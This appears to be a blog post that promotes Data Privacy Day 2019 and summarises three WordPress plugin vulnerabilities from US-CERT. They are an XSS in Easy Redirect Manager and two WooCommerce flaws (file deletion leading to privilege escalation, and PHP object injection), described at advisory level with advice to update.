WordPress Vulnerabilities 19.01.22

January 28th is Data Privacy Day!

Data Privacy Day (DPD) will be held on January 28th, 2019. It is an annual effort to promote data privacy awareness and education. DPD 2019 is sponsored by the National Cyber Security Alliance (NCSA), focus around the theme, A New Era in Privacy.

The NCSA Stay Safe Online website will feature a live stream of the Data Privacy Day 2019 – Live From LinkedIn event, with presentations on the opportunities, challenges and future of privacy. The event will also feature a TED-style talk with a global principal security architect from Amazon Web Services (AWS).

The National Cybersecurity and Communications Integration Center (NCCIC) is part of the Cybersecurity and Infrastructure Security Agency (CISA). NCCIC encourages all users and administrators to review the NCSA’s tips on Managing Your Privacy and the following NCCIC tips:

https://staysafeonline.org/


There were three new WordPress vulnerabilities to report this week according to US-CERT. Always keep your plugins and themes up to date.

Premium WP Suite Easy Redirect Manager

The Premium WP Suite Easy Redirect Manager plugin 2.18.18 for WordPress has Cross-Site Scripting (XSS) via a crafted GET request that is mishandled during log viewing at the templates/admin/redirect-log.php URI. Unfortunately, there are no plans to support this plugin and you should migrate to another solution as quickly as possible. The plugin is no longer available in the U.S. WordPress repository.

WooCommerce prior to 3.4.6

The logging system of the Automattic WooCommerce plugin before 3.4.6 for WordPress is vulnerable to a File Deletion vulnerability. This allows deletion of woocommerce.php, which leads to certain privilege checks not being in place, and therefore a shop manager can escalate privileges to admin.

WooCommerce prior to 3.2.4

In the Automattic WooCommerce plugin before 3.2.4 for WordPress, an attack is possible after gaining access to the target site with a user account that has at least Shop manager privileges. The attacker then constructs a specifically crafted string that will turn into a PHP object injection involving the includes/shortcodes/class-wc-shortcode-products.php WC_Shortcode_Products::get_products() use of cached queries within shortcodes.

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Scroll to Top
Call now!